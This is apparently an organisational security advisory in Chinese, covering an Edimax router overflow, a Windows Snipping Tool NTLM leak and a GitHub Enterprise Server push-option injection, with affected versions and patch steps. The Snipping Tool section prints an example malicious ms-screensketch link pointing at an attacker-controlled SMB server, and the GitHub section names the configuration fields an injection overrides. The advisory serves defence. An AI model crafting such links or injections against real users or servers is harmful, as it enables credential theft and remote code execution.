一、Edimax 路由器缓冲区溢出风险
Edimax(爱迪麦斯)是台湾讯舟科技的小型办公无线路由器,常用于办公共享宽带上网。
1. 风险内容
远程攻击者通过 WAN 设置接口(/goform/setWAN)操纵 pptpDfGateway 等参数触发栈缓冲区溢出,可导致拒绝服务(DoS)或潜在远程代码执行(RCE)。
2. 影响范围
Edimax BR-6208AC <= 1.02
BR-6428nC <= 1.16
3. 修复建议
联系信息中心获取版本更新链接。
二、Windows 截图工具欺骗风险
Windows 截图工具(Snipping Tool)是 Windows 系统自带的轻量级屏幕捕获工具,用于日常办公、学习中快速截取、标注并分享屏幕内容。
1. 风险内容
Windows 截图工具在处理自定义 URI 协议 ms-screensketch时存在输入验证缺陷。该应用注册的深层链接允许通过 filePath参数指定远程文件路径。由于未对参数值进行充分校验,当用户访问恶意构造的链接(例如 ms-screensketch:edit?filePath=\\攻击者控制的 SMB 服务器\image.png)时,截图工具会尝试建立 SMB 连接以访问远程资源,从而在用户无感知的情况下发起 NTLM 身份认证协商,导致当前用户的 Net-NTLM 哈希凭据泄露至攻击者控制的服务器。成功利用此漏洞可造成凭据中继或离线破解风险,攻击常借助社会工程学诱导用户点击伪装链接触发。
2. 影响范围
Windows 11:
Version 26H1 < 10.0.28000.1836
Version 25H2 < 10.0.26200.8246
Version 24H2 < 10.0.26100.8246
Version 23H2 < 10.0.22631.6936
Windows 10:
Version 22H2 < 10.0.19045.7184
Version 21H2 < 10.0.19044.7184
Version 1809 < 10.0.17763.8644
Version 1607 < 10.0.14393.9060
Windows Server:
Windows Server 2025 < 10.0.26100.32690
Windows Server 2022, 23H2 < 10.0.25398.2274
Windows Server 2022 < 10.0.20348.5020
Windows Server 2019 < 10.0.17763.8644
Windows Server 2016 < 10.0.14393.9060
Windows Server 2012 R2 < 6.3.9600.23132
Windows Server 2012 < 6.2.9200.26026
3. 修复建议
方法一.使用 Windows Update 更新
自动更新:Microsoft Update 默认启用,当系统检测到可用更新时,将会自动下载更新并在下一次启动时安装。
手动更新:
1.点击“开始菜单”或按 Windows 快捷键,点击进入“设置”。
2.选择“更新和安全”,进入“Windows 更新”。
3.选择“检查更新”,等待系统将自动检查并下载可用更新。
4.重启计算机,安装更新。系统重新启动后,可通过进入“Windows 更新”->“查看更新历史记录”查看是否成功安装了更新。对于没有成功安装的更新,可以点击该更新名称进入微软官方更新描述链接,点击最新的 SSU 名称并在新链接中点击“Microsoft 更新目录”,然后在新链接中选择适用于目标系统的补丁进行下载并安装。
方法二. 手动安装补丁
Microsoft 官方下载相应补丁进行更新。
三、GitHub X-Stat 协议注入导致远程代码执行风险
GitHub Enterprise Server 是私有化部署的企业级代码托管与协作平台,用于企业内网管控代码资产、研发协作。
1. 风险内容该漏洞源于 babeld 代理在处理 git push 选项时,未对分号(;)等特殊定界符进行有效转义,直接将其嵌入内部 X-Stat 协议头中。由于该协议采用“末尾写入获胜(Last-write-wins)”的语义,攻击者可注入恶意字段覆盖 rails_env、custom_hooks_dir 等关键安全配置。通过将环境篡改为非生产模式并重定向钩子目录,攻击者可诱导 pre-receive hook 执行受控的任意二进制文件,从而在GitHub.com 共享存储节点或GHES服务器上实现 git 用户权限的代码执行。
2. 影响范围
3.14.0 <= GitHub Enterprise Server < 3.14.25
3.15.0 <= GitHub Enterprise Server < 3.15.20
3.16.0 <= GitHub Enterprise Server < 3.16.16
3.17.0 <= GitHub Enterprise Server < 3.17.13
3.18.0 <= GitHub Enterprise Server < 3.18.7
3.19.0 <= GitHub Enterprise Server < 3.19.4
3. 修复建议
联系信息中心获取版本更新链接。